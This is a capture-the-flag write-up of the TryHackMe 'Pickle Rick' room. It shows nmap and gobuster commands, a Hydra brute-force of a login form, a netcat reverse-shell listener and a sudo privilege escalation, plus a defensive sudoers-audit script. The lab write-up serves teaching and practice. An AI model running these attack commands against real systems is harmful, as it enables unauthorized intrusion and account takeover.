Pickle Rick | THM Challenge #Easy

Notyo Biness

Hello, fellow hackers!

Today, I’ll walk you through my journey in this easy TryHackMe challenge, which is themed around Rick and Morty. As described in the challenge, our task is to exploit the web server and locate three ingredients (flags) to help Rick return to his human form.

Initial Reconnaissance

After launching the target machine and AttackBox, my first step was to run a basic port scan to familiarize myself with the server.

nmap -T4 -Pn -sV 10.10.107.135

Nmap Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

So, we have SSH and HTTP open. Time to check the webpage!

Exploring the Web Application

The main page greets us with Rick’s message to Morty—he turned himself into a pickle again and needs help finding the three ingredients.

Checking the Source Code

Before diving deeper, I checked the page source and found this hidden comment:

<!--
    Note to self, remember username!
    Username: R1ckRul3s
-->

Nice! We have a username. Now, we need to find a login page.

Directory Enumeration

I used Gobuster to find hidden directories:

gobuster dir -u http://10.10.107.135 -w /path/to/wordlist

Results:

/assets               (301)
/server-status        (403)

Not much… Let’s try again with .php and .html extensions:

gobuster dir -u http://10.10.107.135 -w /path/to/wordlist -x .php,.html

Results:

/login.php            (200)
/portal.php           (302)
/denied.php           (302)

Bingo! We found /login.php.

Bruteforcing Login

Since SQL injection didn’t seem to work, I moved to bruteforce the password using Hydra:

hydra -l R1ckRul3s -P rockyou.txt <TARGET_IP> http-post-form "/login.php:username=^USER^&password=^PASS^&sub=Login:F=Invalid"

After 1.5 million attempts with no success, I rechecked the basics and discovered a robots.txt file containing a strange string:

Wubbalubbadubdub

Could this be the password? Let’s try it.

Success! I’m in. 🎉

Exploiting the Command Panel

Inside, I found a command execution panel.
I tried ls and found the first ingredient but couldn’t use cat.
Instead, I used less ingredient-1.txt, and it worked. ✅

Next, I checked the home directories and found the second ingredient in Rick’s home folder. ✅

The third ingredient should be in /root, but I didn't have permission to access it.

Privilege Escalation

Running sudo -l revealed:

User www-data may run the following commands on ip-10-10-94-233:
(ALL) NOPASSWD: ALL

That means I have full sudo access!
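
From the defender's side, the rule behind that sudo -l output can be caught with a simple audit. The script below is an added example, not part of the original write-up or the challenge; the sample sudoers content, the service-account list and the scoped deploy rule are constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the write-up: flag sudoers rules that hand a
# service account passwordless, unrestricted sudo.

# Constructed sample: the weak rule implied by the `sudo -l` output above,
# beside a scoped alternative (the reload command is a hypothetical example).
sample_sudoers() {
cat <<'EOF'
# /etc/sudoers.d/webapp (constructed sample)
Defaults env_reset
root      ALL=(ALL:ALL) ALL
www-data  ALL=(ALL) NOPASSWD: ALL
deploy    ALL=(root) NOPASSWD: /usr/bin/systemctl reload apache2
EOF
}

# Accounts that run network-facing daemons (assumed list; adjust per host).
SERVICE_ACCOUNTS="www-data nginx apache mysql postgres nobody"

# audit_sudoers: reads sudoers text on stdin and prints "user: rule" for each
# listed service account whose rule is the plain "NOPASSWD: ALL" form.
audit_sudoers() {
    awk -v accts="$SERVICE_ACCOUNTS" '
        BEGIN { n = split(accts, a, " "); for (i = 1; i <= n; i++) svc[a[i]] = 1 }
        /^[ \t]*(#|$)/     { next }   # comments and blank lines
        /^[ \t]*Defaults/  { next }   # option lines, not user rules
        ($1 in svc) && /NOPASSWD:[ \t]*ALL[ \t]*$/ { print $1 ": " $0 }
    '
}

# Stand-alone run on the sample; on a real host, feed it the output of
# `sudo cat /etc/sudoers /etc/sudoers.d/*` instead.
sample_sudoers | audit_sudoers
```

Only the www-data line is reported: the scoped deploy rule names a single command, and root is not in the service-account list.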

Getting a Root Shell

I generated a reverse shell payload using RevShells and set up a listener:

nc -nlvp 4444

Then executed:

sudo su -

Now I’m root! 🏴‍☠️

ls /root
cat 3rd.txt

Final flag retrieved!

Conclusion

This challenge was a great mix of recon, enumeration, bruteforcing, and privilege escalation. Key takeaways:
✔ Always check robots.txt
✔ Bruteforcing isn’t always the answer
✔ Always check sudo permissions for privesc

What do you think? Would you have solved it differently? Let me know! 👇
